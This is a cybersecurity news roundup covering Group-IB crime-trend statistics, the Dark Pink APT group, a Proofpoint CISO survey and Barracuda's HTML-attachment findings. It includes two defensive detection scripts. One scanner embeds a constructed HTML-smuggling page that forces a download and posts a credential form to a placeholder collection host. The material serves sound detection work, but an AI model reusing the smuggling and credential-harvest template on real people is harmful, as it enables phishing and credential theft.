Ransomware, Initial Access Brokers, Carding – Group-IB Presents Report on Trending Crimes
Group-IB has presented its research into global cyber threats in the report Hi-Tech Crime Trends 2021/2022 at its annual threat hunting and intelligence conference, CyberCrimeCon’21. In the report, which explores cybercrime developments in H2 2020–H1 2021, Group-IB researchers analyze the increasing complexity of the global threat landscape and highlight the ever-growing role of alliances between threat actors. The trend manifests itself in partnerships between ransomware operators and initial access brokers under the Ransomware-as-a-Service model. Scammers also band together in clans to automate and streamline fraudulent operations. Conversely, individual cybercrimes such as carding are in decline for the first time in a while.
For the 10th consecutive year, the Hi-Tech Crime Trends report analyzes the various aspects of the cybercriminal industry’s operations, examines attacks, and provides forecasts for the threat landscape in various sectors. For the first time, the report is divided into five volumes, each with a different focus: ransomware, the sale of access to corporate networks, cyber warfare, threats to the financial sector, and phishing and scams. The forecasts and recommendations outlined in Hi-Tech Crime Trends 2021/2022 seek to prevent damage and downtime for companies worldwide.
Unwanted guests: over 1,000 accesses to corporate networks were offered for sale in the darknet
One of the underlying trends in the cybercrime arena is a sharp increase in the number of offers to sell access to compromised corporate networks. The corporate initial access market grew by almost 16% in H2 2020–H1 2021, from $6,189,388 to $7,165,387, and the number of offers to sell access to companies tripled over the review period, from 362 to 1,099. This data was obtained by Group-IB’s Threat Intelligence & Attribution system, which collects posts from cybercriminal underground forums, including posts that were later deleted.
This segment of the cybercriminal underground has a relatively low entry barrier. Poor corporate cyber risk management combined with the fact that tools for conducting attacks against corporate networks are widely available both contributed to a record-breaking rise in the number of initial access brokers. In H2 2019–H1 2020, the Group-IB Threat Intelligence team detected only 86 active brokers. In H2 2020–H1 2021, however, this number skyrocketed to 262, with 229 new players joining the roster.
Most companies affected belonged to manufacturing (9% of all companies), education (9%), financial services (9%), healthcare (7%), and commerce (7%). In the review period, the number of industries targeted by initial access brokers surged from 20 to 35, which indicates that cybercriminals are becoming aware of the variety of potential victims.
The geography of initial access brokers’ operations has also expanded. In H2 2020–H1 2021, the number of countries where cybercriminals broke into corporate networks increased from 42 to 68. US-based companies are the most popular among sellers of access to compromised networks — they account for 30% of all victim companies in H2 2020–H1 2021, followed by France (5%), and the UK (4%).
In the Middle East alone, the total cost of all the accesses to the region’s companies available in the underground rose by 37% in the review period and totaled $247,836. Most of the accesses on sale belonged to organizations from the United Arab Emirates (24%), followed by Israel (13%), Turkey (13%), Saudi Arabia (12%), and Iran (12%).
One of the main driving forces for initial access market growth is the steep increase in the number of ransomware attacks. Initial access brokers remove the need for ransomware operators to break into corporate networks on their own.
Lock, Lock Who’s There? Corporansom
The unholy alliance of initial access brokers and ransomware operators as part of Ransomware-as-a-Service (RaaS) affiliate programs has led to the rise of the ransomware empire. In total, data relating to 2,371 companies was released on DLSs (Data Leak Sites) over H2 2020–H1 2021. This is an unprecedented increase of 935% compared to the previous review period, when data relating to 229 victims was made public.
Thanks to the Threat Intelligence & Attribution system, Group-IB researchers were able to trace how the ransomware empire has evolved since it appeared. Group-IB’s team analyzed private ransomware affiliate programs, the DLSs where operators post data exfiltrated from victims who refused to pay the ransom, and the most aggressive ransomware strains.
Over the review period, Group-IB analysts identified 21 new Ransomware-as-a-Service (RaaS) affiliate programs, which is a 19% increase compared to the previous period. During the review period, the cybercriminals mastered the use of DLSs, which are used as an additional source of pressure on their victims to make them pay the ransom by threatening to leak their data. In practice, however, victims can still find their data on the DLS even if the ransom is paid. The number of new DLSs more than doubled during the review period and reached 28, compared to 13 in H2 2019–H1 2020.
It is noteworthy that in the first three quarters of 2021, ransomware operators released 47% more data on attacked companies than in the whole of 2020. Given that cybercriminals publish data on only about 10% of their victims, the actual number of ransomware victims is many times higher. The share of companies that opt to pay the ransom is estimated at 30%.
Having analyzed ransomware DLSs in 2021, Group-IB analysts concluded that Conti was the most aggressive ransomware group, having made public information about 361 victims (16.5% of all victim companies whose data was released on a DLS), followed by Lockbit (251), Avaddon (164), REvil (155), and Pysa (118). Last year’s Top 5 was as follows: Maze (259), Egregor (204), Conti (173), REvil (141), and Pysa (123).
Country-wise, most companies whose data was posted on DLSs by ransomware operators in 2021 were based in the United States (968), Canada (110), and France (103), while most organizations affected belonged to the manufacturing (9.6%), real estate (9.5%), and transportation industries (8.2%).
In the Middle East, at least 50 organizations fell prey to ransomware attacks in 2021 so far. For comparison, in 2020 the data of 27 companies in the region was released on DLSs, so this is an increase of 85%. In the current year, the majority of publicly known ransomware victims in the Middle East were based in Turkey (20%), the United Arab Emirates (18%), Saudi Arabia (18%), Israel (10%), and Iran (6%).
Another cohort of cybercriminals actively forging partnerships over the review period were scammers. In recent years, phishing and scam affiliate programs have become highly popular. The research conducted by Group-IB revealed that there are more than 70 phishing and scam affiliate programs. Participants aim to steal money as well as personal and payment data. In the reporting period, the threat actors who took part in such schemes pocketed at least $10 million in total. The average amount stolen by a scam affiliate program member is estimated at $83.
Affiliate programs involve large numbers of participants, have a strict hierarchy, and use complex technical infrastructures to automate fraudulent activities. Phishing and scam affiliate programs actively use Telegram bots that provide participants with ready-to-use scam and phishing pages. This helps scale phishing campaigns and tailor them to banks, popular email services, and other organizations.
Phishing and scam affiliate programs, initially focused on Russia and other CIS countries, have recently started migrating to Europe, America, Asia, and the Middle East. This is exemplified by Classiscam, an automated scam-as-a-service designed to steal money and payment data. Group-IB is aware of at least 71 brands from 36 countries impersonated by affiliate program members. Phishing and scam websites created by affiliate program members most often mimic marketplaces (69.5%), delivery services (17.2%), and carpooling services (12.8%).
Carding: The Joker’s Last Laugh
Over the review period, the carding market dropped by 26%, from $1.9 billion to $1.4 billion compared to the previous period. The decrease can be explained by the lower number of dumps (data stored on the magnetic stripe on bank cards) offered for sale: the number of offers shrank by 17%, from 70 million records to 58 million, due to the infamous card shop Joker’s Stash shutting down. Meanwhile, the average price of a bank card dump fell from $21.88 to $13.84, while the maximum price surged from $500 to $750.
An opposite trend was recorded in the market for bank card text data (card numbers, expiration dates, cardholder names, addresses, CVVs): the number of records soared by 36%, from 28 million to 38 million, which can be explained in part by the higher number of phishing sites mimicking well-known brands during the pandemic. The average price for text data climbed from $12.78 to $15.2, while the maximum price rose almost 7-fold, from $150 to an unprecedented $1,000.
The Middle East followed the global trend: its carding market dropped by 49% in the review period, from $47.6 million in H2 2019–H1 2020 to $24.4 million in H2 2020–H1 2021. The total number of cards belonging to bank customers in the Middle East offered for sale over the examined period was 1,546,842, a 34% decline compared to the previous review period, when 2,353,854 card records were offered.
This was accompanied by the increase in the average price of text card data from $8.95 to $14.09 and a dramatic drop in the price of a dump from $69.82 to $22.91.
A Total of 13 Organizations in 9 Countries Fall Victim to “Dark Pink”
Group-IB has today published a new update on the APT (advanced persistent threat) group codenamed Dark Pink, revealing that a total of 13 organizations in 9 countries have now fallen victim to this actor. Dark Pink’s operations were detailed in depth by Group-IB’s Threat Intelligence unit in a January 2023 blog post; at that time, researchers linked the group to attacks on 7 organizations in the Asia-Pacific region and 1 in Europe. Group-IB experts have since discovered 5 new Dark Pink victims, and the geographic scope of the group’s operations is wider than previously thought, as organizations in Brunei, Thailand, and Belgium were all hit by Dark Pink attacks.
Continued analysis has revealed that this group is still active, as Dark Pink attacked a government ministry in Brunei this past January and a government agency in Indonesia as recently as April 2023. Additionally, Group-IB researchers were able to attribute three other attacks from 2022 to this particular APT group. The initial access vector for Dark Pink attacks continues to be spear-phishing emails, and Group-IB researchers noted in their January 2023 blog that the group utilized an almost-entirely custom toolkit to exfiltrate files and messenger data from infected devices and networks.
Since then, Group-IB experts have found that Dark Pink has updated many of these custom tools, changing their functionality to evade detection by security products. For example, the group’s custom KamiKakaBot module, designed to read and execute commands from the threat actors via Telegram, is still stored on the filesystem of infected devices, but it is now split into two distinct parts: one that controls the device and one that steals sensitive data. Dark Pink also continues to use the MSBuild utility (Microsoft’s build engine, which will compile and run code embedded in the project file it is given) to launch KamiKakaBot in the infection chain.
Group-IB’s Threat Intelligence unit has discovered Dark Pink’s new account on GitHub, which was created as soon as the first information about the APT group was published in the public domain this past January. The threat actors can issue commands to infected machines to download files from this GitHub account, and Group-IB researchers found 12 commits to the new account performed between January 9 and April 11, 2023.
Recent attacks have also seen the group exfiltrate stolen data over HTTP using a webhook service, and leverage the functionality of an MS Excel add-in to ensure the persistence of TelePowerBot (a simpler version of KamiKakaBot written in PowerShell). In line with Group-IB’s zero-tolerance policy on cybercrime, all confirmed and potential victims of Dark Pink attacks were issued proactive warnings.
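Two of the behaviours described above, a payload launched through MSBuild and persistence through an Excel add-in, are things a defender can look for in endpoint telemetry. The following Python script is an added example, not Group-IB’s tooling: it runs a few rules over constructed Sysmon-style events (EventID 1 process creation, 11 file creation, 13 registry value set). The rules, paths and sample events are assumptions for the demo; the add-in locations checked are Excel’s usual auto-load spots (the XLSTART folder and the Options\OPEN registry values), not a claim about which one Dark Pink used.

```python
"""Flag MSBuild launching a project from a user-writable path and Excel
add-in persistence in Sysmon-style events.

Added example, not Group-IB's code. Event layout mimics Sysmon
(EventID 1 = process create, 11 = file create, 13 = registry value set).
All paths, key names and sample events below are constructed for the demo.
"""
import re

# Locations an unprivileged user can write to; a build engine reading its
# project file from one of these is unusual outside a developer workstation.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\", re.I)
MSBUILD_IMAGE = re.compile(r"\\msbuild\.exe$", re.I)

# Excel auto-loads add-ins dropped in XLSTART and those listed in the
# Options\OPEN registry values (assumed generic persistence spots).
XLSTART_ADDIN = re.compile(r"\\XLSTART\\[^\\]+\.(?:xll|xlam|xla)$", re.I)
EXCEL_OPEN_VALUE = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Excel\\Options\\OPEN\d*$", re.I)


def check_event(ev):
    """Return the name of the rule the event trips, or None."""
    eid = ev.get("EventID")
    if eid == 1 and MSBUILD_IMAGE.search(ev.get("Image", "")):
        if USER_WRITABLE.search(ev.get("CommandLine", "")):
            return "msbuild_project_in_user_writable_path"
    elif eid == 11 and XLSTART_ADDIN.search(ev.get("TargetFilename", "")):
        return "excel_addin_dropped_in_xlstart"
    elif eid == 13 and EXCEL_OPEN_VALUE.search(ev.get("TargetObject", "")):
        return "excel_addin_registered_via_options_open"
    return None


def detect(events):
    """Run every event through the rules; return (event index, rule) pairs."""
    hits = []
    for i, ev in enumerate(events):
        rule = check_event(ev)
        if rule:
            hits.append((i, rule))
    return hits


SAMPLE_EVENTS = [  # constructed telemetry, not real data
    {"EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r'MSBuild.exe "C:\Users\alice\AppData\Local\Temp\update.xml"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1,  # legitimate build from a source tree: no hit
     "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r'MSBuild.exe "C:\src\app\app.csproj" /t:Build',
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"EventID": 11,
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Excel\XLSTART\helper.xlam"},
    {"EventID": 11,  # ordinary document: no hit
     "TargetFilename": r"C:\Users\alice\Documents\budget.xlsx"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Excel\Options\OPEN",
     "Details": r'/R "C:\Users\alice\AppData\Roaming\helper.xlam"'},
]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The MSBuild rule keys on where the project file lives rather than on MSBuild itself, because the binary is legitimate on any machine with the .NET Framework installed; on build servers you would add an allow-list of parent processes. The two Excel rules fire on the write, which is the moment to catch persistence, since by the next Excel start the add-in is already running.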
“Dark Pink APT shows no sign of slowing down,” Andrey Polovinkin, Malware Analyst at Group-IB, said. “APT groups are renowned for their responsiveness and ability to adapt their custom tools to continually avoid detection, and Dark Pink is no exception. The profile of the affected targets underscores the significant danger that Dark Pink poses for both public- and private-sector actors. Group-IB will continue to analyze all Dark Pink activity and ensure that confirmed and potential victims are informed.”
CISOs in the Middle East Have Dealt With Loss of Sensitive Data in the Past 12 Months, Says Proofpoint
Proofpoint, Inc., a leading cybersecurity and compliance company, today released its annual Voice of the CISO report, which explores key challenges, expectations, and priorities of chief information security officers (CISOs). The findings reveal that most CISOs have returned to the elevated concerns they experienced early in the pandemic. Seventy-five percent of CISOs in the UAE surveyed feel at risk of a material cyber attack, compared to 44% the year before, when they may have felt a brief sense of calm after adapting to the chaos of the pandemic.
This year’s data is a shift back to 2021 when 68% of CISOs in the UAE believed a material attack was imminent. Likewise, sentiments about preparedness levels have reversed: 57% feel unprepared to cope with a targeted cyber attack, showing a moderate increase over last year’s 47% and a decrease from 2021’s 72%.
While organizations have largely overcome the disruptions of the last two years, the effects of the Great Resignation and employee turnover continue to linger, exacerbated by the recent wave of mass layoffs: 75% of CISOs in the UAE say that employees leaving the organization played a role in a data loss event. Although 47% of security leaders had to deal with the loss of sensitive information in the past 12 months, 61% believe they have adequate data protection in place.
The 2023 Voice of the CISO report examines global third-party survey responses from more than 1,600 CISOs at mid-to-large size organizations across different industries. Throughout the course of Q1 2023, 100 CISOs were interviewed in each market across 16 countries: UAE, KSA, the U.S., Canada, the UK, France, Germany, Italy, Spain, Sweden, the Netherlands, Australia, Japan, Singapore, South Korea, and Brazil.
The report discusses global trends and regional differences around three central themes: the threats and risks CISOs face daily; the impact of employees on organizations’ cyber preparedness; and the defenses CISOs are building, especially as the economic downturn puts pressure on security budgets. The survey also measures the changes in alignment between security leaders and their boards of directors, exploring how their relationship impacts security priorities.
“Years of sustained remote and hybrid working have resulted in an increased risk around insider threat incidents, with our research revealing that three-quarters of CISOs in the UAE agree that people leaving the organization contribute to data loss,” said Emile Abou Saleh, Regional Director, Middle East and Africa at Proofpoint. “The rising challenges of protecting people and data, high expectations, burnout, and uncertainty about personal liability are testing CISOs in the UAE. The way forward is to implement layered defenses, including a dedicated insider threat management solution and strong security awareness training, so organizations are well protected against threats that focus on people as the main perimeter.”
Proofpoint’s Voice of the CISO report for 2023 includes the following findings about the UAE:
- CISOs in the UAE have returned to the elevated concerns they experienced early in the pandemic, while also feeling more unprepared than last year: 75% of CISOs in the UAE feel at risk of experiencing a material cyber attack in the next 12 months, compared to 44% last year and 68% in 2021. Further, 57% believe their organization is unprepared to cope with a targeted cyber attack, compared to 47% last year and 72% in 2021.
- The loss of sensitive data is exacerbated by employee turnover: 47% of security leaders in the UAE reported having to deal with a material loss of sensitive data in the past 12 months, and of those, 75% agreed that employees leaving the organization contributed to the loss. Despite those losses, 61% of CISOs in the UAE believe they have adequate controls to protect their data.
- Email fraud tops the list of the most significant threats: The top threats perceived by CISOs in the UAE are almost the same as last year. In both years email fraud (business email compromise) and cloud account compromise led the way, but this year they were followed by malware and smishing/vishing, whereas last year malware was joined by insider threats as the other top concern.
- Most organizations are likely to pay a ransom if impacted by ransomware: 59% of CISOs in the UAE believe their organization would pay to restore systems and prevent data release if attacked by ransomware in the next 12 months. And they are relying on insurance to shift the risk—56% said they would place a cyber insurance claim to recover losses incurred in various types of attacks.
- Supply chain risk is a recurring priority: 56% of CISOs in the UAE say they have adequate controls in place to mitigate supply chain risk, a modest increase from last year’s 49%. While these protections may feel adequate for now, going forward, CISOs may feel more strapped for resources—65% say their budgets have been impacted.
- People risk grows as a concern: There is an increase in the number of CISOs in the UAE who view human error as their organization’s biggest cyber vulnerability—59% in this year’s survey vs. 50% in 2022 and 70% in 2021. At the same time, 56% of CISOs believe that employees understand their role in protecting the organization, compared to 51% in 2022 and 69% in 2021; this illustrates a struggle to build a strong security culture.
- CISOs and boards are much more in tune: 63% of CISOs in the UAE agree their board members see eye-to-eye with them on cybersecurity issues. This is a substantial increase from the 47% of CISOs who shared this view last year and the same as the 63% who felt this way in 2021.
- Mounting CISO pressures are making the job increasingly unsustainable: 59% of CISOs in the UAE feel they face unreasonable job expectations, a significant increase from last year’s 38%. While the return to their new reality may be one reason behind this view, CISOs’ job-related angst is a likely contributor as well—60% are concerned about personal liability and 59% say they have experienced burnout in the past 12 months.
“Security leaders must remain steadfast in protecting their people and data, a task made increasingly difficult as insiders prove themselves as a significant contributor to sensitive data loss,” said Ryan Kalember, executive vice president of cybersecurity strategy for Proofpoint. “If recent devastating attacks are any indication, CISOs have an even tougher road ahead, especially given the precarious security budgets and new job pressures. Now that they have returned to elevated levels of concern, CISOs must ensure they focus on the right priorities to move their organizations toward cyber resilience.”
HTML Attachments Remain the Most Dangerous File, Says Barracuda
A new Barracuda Threat Spotlight shows how in March 2023 just under half (45.7%) of all HTML attachments scanned by the company were malicious. This follows a steady upward trend in the proportion of malicious HTML files since Barracuda’s last report on the threat in May 2022 when the proportion was less than half (21%) of the current value. In comparison, only 0.03% and 0.009% of the highly popular Microsoft Office and PDF file types were found to be malicious.
HTML stands for Hypertext Markup Language and is used to create and structure content displayed online. It is also used in email, for example in automated newsletters and marketing materials, and reports are often attached to an email as HTML files (with the extension .html, .htm, or .xhtml, for example). Attackers leverage HTML attachments for phishing and credential theft or for malware delivery. Because the file is rendered locally in the recipient’s browser, a fake login form or a script that assembles a payload on the client side can reach the user without the attacker hosting a URL for link scanners to inspect.
The data follows analysis by Barracuda researchers of many millions of messages and files scanned by the company’s security technologies. “The security industry has been highlighting cybercriminals weaponizing HTML for years – and evidence suggests it remains a successful and popular attack tool,” said Fleming Shi, Chief Technology Officer, Barracuda.
Barracuda’s analysis further shows that not only is the overall volume of malicious HTML attachments increasing, nearly a year since the company’s last report, but HTML attachments also remain the file type most likely to be used for malicious purposes. “Getting the right security in place is as important now as it has ever been. This means having effective, AI-powered email protection in place that can evaluate the content and context of an email beyond scanning links and attachments. Other important elements include implementing robust multifactor authentication or – ideally – Zero Trust Access controls; having automated tools to respond to and remediate the impact of any attack; and training people to spot and report suspicious messages,” said Shi.
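To make the attachment risk concrete, here is an added Python example, not Barracuda’s scanner or research: it pulls HTML attachments out of an .eml, decodes them past the transfer encoding, and scores each against constructs typical of phishing pages and HTML smuggling (a password field, client-side decoders such as atob, Blob-based downloads, long base64 blobs, meta refresh redirects). The rule list, weights and alert threshold are assumptions for the demo, and the sample message is constructed in code so the script runs offline.

```python
"""Triage HTML e-mail attachments for phishing / HTML-smuggling indicators.

Added example, not Barracuda's product. The regexes, weights and threshold
are assumptions; the .eml below is constructed in code for the demo.
"""
import base64
import email
import re
from email import policy
from email.message import EmailMessage

HTML_EXTENSIONS = (".html", ".htm", ".xhtml")

# (rule name, pattern, weight): assumed weights, tune against your own mail flow.
RULES = [
    ("password_form", re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I), 3),
    ("js_decoder", re.compile(r"\b(?:atob|unescape|String\.fromCharCode)\s*\(", re.I), 2),
    ("blob_download", re.compile(r"\bnew\s+Blob\s*\(|msSaveOrOpenBlob|\.download\s*=", re.I), 3),
    ("data_uri", re.compile(r"data:[\w/+.-]+;base64,", re.I), 2),
    ("meta_refresh", re.compile(r"<meta[^>]+http-equiv\s*=\s*[\"']?refresh", re.I), 1),
    ("long_base64", re.compile(r"[A-Za-z0-9+/]{400,}={0,2}"), 2),
]
ALERT_THRESHOLD = 4  # assumed: at or above this the attachment is flagged


def iter_html_attachments(msg):
    """Yield (filename, decoded text) for every attached HTML part."""
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(HTML_EXTENSIONS) or part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True) or b""  # undoes base64/QP transfer encoding
            yield name, raw.decode("utf-8", errors="replace")


def score_html(html):
    """Return (score, [names of the rules that matched])."""
    hits = [name for name, rx, _ in RULES if rx.search(html)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def scan_eml(raw_eml):
    """Parse a raw RFC 5322 message and score each HTML attachment."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    results = []
    for name, html in iter_html_attachments(msg):
        score, hits = score_html(html)
        results.append({"attachment": name, "score": score, "hits": hits,
                        "malicious": score >= ALERT_THRESHOLD})
    return results


BENIGN_HTML = b"""<html><body><h1>Monthly report</h1>
<p>See <a href="https://example.com/report">the dashboard</a>.</p></body></html>"""

# Smuggling-style page (constructed): decodes an embedded blob in the browser,
# forces a download, then shows a credential form. The blob is 400 'A' bytes.
SMUGGLED_HTML = b"""<html><body><script>
var b64 = "%s";
var bytes = atob(b64);
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
a.click();
</script>
<form action="https://example.invalid/collect" method="post">
  <input type="email" name="u"><input type="password" name="p">
</form></body></html>""" % base64.b64encode(b"A" * 400)


def build_sample_eml():
    """Construct a test message with one benign and one suspicious HTML attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please find the attached files.")
    msg.add_attachment(BENIGN_HTML, maintype="text", subtype="html", filename="report.html")
    msg.add_attachment(SMUGGLED_HTML, maintype="text", subtype="html", filename="invoice.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for result in scan_eml(build_sample_eml()):
        print(result)
```

Scoring the decoded attachment rather than the raw message matters: the base64 transfer encoding of a perfectly benign attachment would otherwise trip the long-blob rule, while an obfuscated page would be invisible until decoded. The heuristics are deliberately simple; in production they sit behind, not instead of, rendering the page in a sandbox and inspecting what it actually does.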